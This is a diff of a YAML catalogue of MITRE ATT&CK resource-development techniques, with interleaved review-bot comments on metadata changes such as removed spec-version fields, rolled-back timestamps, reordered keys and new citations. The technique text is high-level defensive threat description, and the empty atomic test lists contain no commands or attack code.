Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -53281,8 +53961,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
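Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed for T1583.002 with nothing in the hunk adding it back, unlike T1583.007 or T1586.003 where the key is bumped to 3.2.0. Combined with the `modified` date in the preceding hunk reverting to 2021-04-15, this looks like an object taken from a bundle that predates the field altogether. The same pairing (2021 modified date plus removal of x_mitre_attack_spec_version) repeats for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003 below. If the field is meant to stay, confirm it still exists elsewhere in each of those objects; if these entries really come from an older snapshot, regenerate them from the same release as the rest of the file.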
@@ -53304,7 +53982,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -53324,8 +54002,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -53364,7 +54040,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -53385,8 +54061,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -53416,7 +54090,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -53453,8 +54127,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -53476,7 +54148,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -53498,8 +54170,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -53536,7 +54206,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -53558,8 +54228,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -53621,7 +54289,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -53643,7 +54310,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -53661,8 +54328,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -53697,7 +54362,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -53716,33 +54381,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
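Review bot: the new sentence in the description adds abuse of messaging services (Twilio, SendGrid, AWS End User Messaging, SNS, SES) for spam and phishing, but x_mitre_detection is left unchanged and still points only at the exfiltration stage via T1537. For this new use the observable lands on the victim side as mail or SMS from a legitimate provider, so the detection text should also point readers at [Phishing](https://attack.mitre.org/techniques/T1566) detection; as it stands the description and the detection guidance cover different behaviours. The two new citation keys have matching external_references entries in the next hunk, and the version bump to 1.1 is appropriate for a description change.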
@@ -53752,10 +54415,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -53763,9 +54435,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -53816,11 +54487,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -53833,7 +54503,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -53868,22 +54538,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
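Review bot: the `|-` literal block preserves line breaks, so the two inserted blank lines (after the IDN sentence and after the WHOIS paragraph) become real paragraph breaks in the rendered description, not stray whitespace; that is the intended effect here. The new `(Citation: Invictus IR DangerDev 2024)` key needs a matching `external_references` entry, which the `@@ -53943,6 +54616,10 @@` hunk supplies, and the `x_mitre_version` bump to 1.4 in the following hunk is the expected companion to a description change.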
@@ -53904,7 +54577,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -53943,6 +54616,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53998,7 +54675,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -54056,7 +54732,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -54136,7 +54811,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -54196,7 +54870,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -54218,7 +54891,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
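Review bot: `modified` for T1588.001 moves backwards, from 2022-04-25T14:00:00.188Z to 2021-10-17T16:15:52.805Z. The same 2022-04-25T14:00:00.188Z stamp recurs on several other objects in this diff (T1583.003, T1585.001, T1587.004, T1608.003, T1588), which points to a bulk re-stamp in the previous source rather than a content edit, so the roll-back is probably right; still, anything that treats `modified` as monotonic (incremental sync, change feeds) will see these as older records, so call it out in the PR description.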
@@ -54237,42 +54910,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
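Review bot: most of this hunk is key reordering (`x_mitre_platforms`, `id`, `type`, `created`, `external_references` and the rest are re-emitted further down for the same T1583.003 object), which buries the real changes. The substantive ones are the `modified` roll-back and the removal of both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` from T1588.001, which, unlike T1583.003, gets no replacement `x_mitre_attack_spec_version` anywhere in this diff; confirm T1588.001 is meant to end up without that field. If the generator can emit keys in a stable order, future syncs will be far easier to review.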
@@ -54281,22 +54922,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
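Review bot: cross-checking the re-emitted T1583.003 block against the removed one, all five `external_references` (mitre-attack, Koczwara Beacon Hunting Sep 2021, TrendmicroHideoutsLease, Mandiant SCANdalous Jul 2020, ThreatConnect Infrastructure Dec 2020) survive with unchanged URLs and descriptions, `revoked: false` and `x_mitre_deprecated: false` are new, and the only field whose value changes is `x_mitre_attack_spec_version` (2.1.0 to 3.2.0). Nothing to fix, but the PR description should say this is a field reorder rather than a content change, since the raw diff suggests otherwise.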
@@ -54310,7 +54982,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -54397,11 +55069,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
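Review bot: another backwards `modified` on T1586 (2023-05-09T14:00:00.188Z to 2023-04-11T01:08:56.774Z). The old value carries the same `T14:00:00.188Z` suffix as the bulk stamp seen on other objects in this diff, so reverting it is consistent with undoing a mass re-stamp, but it belongs in the PR description's list of timestamp regressions for anyone who syncs on `modified`.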
@@ -54461,7 +55132,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -54503,7 +55173,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -54518,7 +55188,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -54609,11 +55278,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
